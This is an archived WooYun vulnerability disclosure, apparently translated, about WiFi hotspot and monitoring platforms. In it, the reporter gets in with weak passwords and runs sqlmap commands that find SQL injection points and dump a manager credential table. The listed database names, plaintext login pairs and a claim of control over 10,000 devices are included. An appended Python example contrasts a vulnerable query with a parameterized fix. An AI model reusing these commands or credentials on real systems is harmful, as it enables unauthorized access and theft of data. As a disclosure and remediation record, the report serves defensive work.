WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
2016-04-17: Details have been sent to the vendor and are awaiting the vendor's handling
2016-04-18: Vendor has confirmed; details are disclosed to the vendor only
2016-04-28: Details disclosed to core white hats and experts in related fields
2016-05-08: Details disclosed to ordinary white hats
2016-05-18: Details disclosed to intern white hats
2016-06-02: Details disclosed to the public
As in the title (RT).
Saw this http://**.**.**.**/bugs/wooyun-2016-0196866 and couldn't wait to try it. Confirmed weak passwords in many places, but only 3 platforms were useful.

http://**.**.**.** admin 123456 to get in.
POST injection:
E:\sqlmap>sqlmap.py -u "http://**.**.**.**/buylist.php" --data "shopid=admin&shopname=admin&from=admin" --dbs
POST injection:
E:\sqlmap>sqlmap.py -u "http://**.**.**.**/buylist.php" --data "shopid=admin&shopname=admin&from=admin" --dbs
POST injection:
E:\sqlmap>sqlmap.py -u "http://**.**.**.**/package.php?action=add" --data "ription=1&number=1&money=1&sort=1&sub=%E4%BF%9D%E5%AD%98" --dbs

http://**.**.**.** weak password admin 123456 to get in.
POST injection:
E:\sqlmap>sqlmap.py -u "http://**.**.**.**/index.php/admin/count/visitors?order=placenum&content=11&ftime=2016-03-29&ttime=2016-03-28" --dbs
POST injection:
E:\sqlmap>sqlmap.py -u "http://**.**.**.**/index.php/admin/count/onlineplace?order=placenum&content=111" -D monitor -T monitor_manager -C "username,password" --dump

http://**.**.**.**/login.php admin bswifi weak password.
POST injection:
E:\sqlmap>sqlmap.py -u "http://**.**.**.**/index.php" --data "hwid=11&place_name=11&place_code=111" --dbs

http://**.**.**.**/admin/index/index admin 1234567 to get into the monitoring system.
Can control more than 10,000 devices.
Database information
back-end DBMS: MySQL 5.0.12
available databases [33]:
[*] bsremote
[*] comiims
[*] demoiims
[*] demowifi
[*] demowifieth
[*] dx
[*] iims
[*] iimstest
[*] information_schema
[*] jxcount
[*] monitor
[*] mysql
[*] openvpn
[*] performance_schema
[*] phpinfo
[*] qscms
[*] raffle
[*] romupdate
[*] sczy_iimstest
[*] sczy_wifi
[*] sczy_wifieth
[*] smscenter
[*] ssp_bswifi
[*] tongji
[*] webbswifi
[*] wifi
[*] wifieth
[*] wifiethtest
[*] wifiptr
[*] wifitest
[*] wireless
[*] wxcms
[*] zentao
Table information (sqlmap table listings with row counts for the comiims and iims databases)
http://**.**.**.**/index.php: 50-plus accounts, the passwords couldn't be decrypted, so I just typed in a weak password and got in: jxdubaoli jxdubaoli
http://**.**.**.**/: the passwords couldn't be decrypted either; brute-forced my way in: tongwang2014 tongwang2014, sucaineng 123456
Fix suggestion: filtering
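Added example, not code from the report or the affected sites: the report's fix suggestion is input filtering, but filtering alone is easy to get wrong, and the durable fix for the POST injections above (buylist.php's shopid/shopname/from parameters) is to bind parameters instead of concatenating them into the query. The snippet shows the concatenated query that makes shopid injectable next to a parameterized one; the in-memory SQLite table, its schema, the row data and the function names are all constructed stand-ins for the MySQL backend, not the real application.

```python
import sqlite3

# Constructed rows for a hypothetical buylist table behind buylist.php.
# The "from" parameter is stored as "src" because FROM is an SQL keyword.
SEED_ROWS = [
    ("shop01", "Shop One", "admin"),
    ("shop02", "Shop Two", "admin"),
    ("shop03", "Shop Three", "guest"),
]


def make_db():
    """In-memory SQLite database standing in for the MySQL backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE buylist (shopid TEXT, shopname TEXT, src TEXT)")
    conn.executemany("INSERT INTO buylist VALUES (?, ?, ?)", SEED_ROWS)
    return conn


def buylist_vulnerable(conn, shopid):
    """Builds the WHERE clause by string concatenation, so the shopid POST
    value becomes part of the SQL text: the defect class the report describes."""
    sql = "SELECT shopid, shopname FROM buylist WHERE shopid = '" + shopid + "'"
    return conn.execute(sql).fetchall()


def buylist_fixed(conn, shopid):
    """Parameterized query: shopid is bound as a value and never parsed as SQL,
    whatever characters it contains, so no filtering rule has to be right."""
    sql = "SELECT shopid, shopname FROM buylist WHERE shopid = ?"
    return conn.execute(sql, (shopid,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    tautology = "' OR '1'='1"  # the textbook probe a scanner such as sqlmap sends
    print(buylist_vulnerable(db, "shop01"))    # one row, as intended
    print(buylist_vulnerable(db, tautology))   # every row: the WHERE clause was rewritten
    print(buylist_fixed(db, tautology))        # no rows: the probe is just a literal
```

The same contrast applies to the other injected parameters in the report (order, content, hwid, place_name, place_code): any value that reaches the SQL text unbound is a query-rewriting point.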
Severity: Medium
Vulnerability Rank: 10
Confirmation time: 2016-04-18 08:58
Thank you very much for your report. The issue in the report has been confirmed and reproduced. Affected data: Medium. Attack cost: Low. Impact: Medium. Overall rating: Medium, rank: 10. We are contacting the relevant site administration unit for handling.
None yet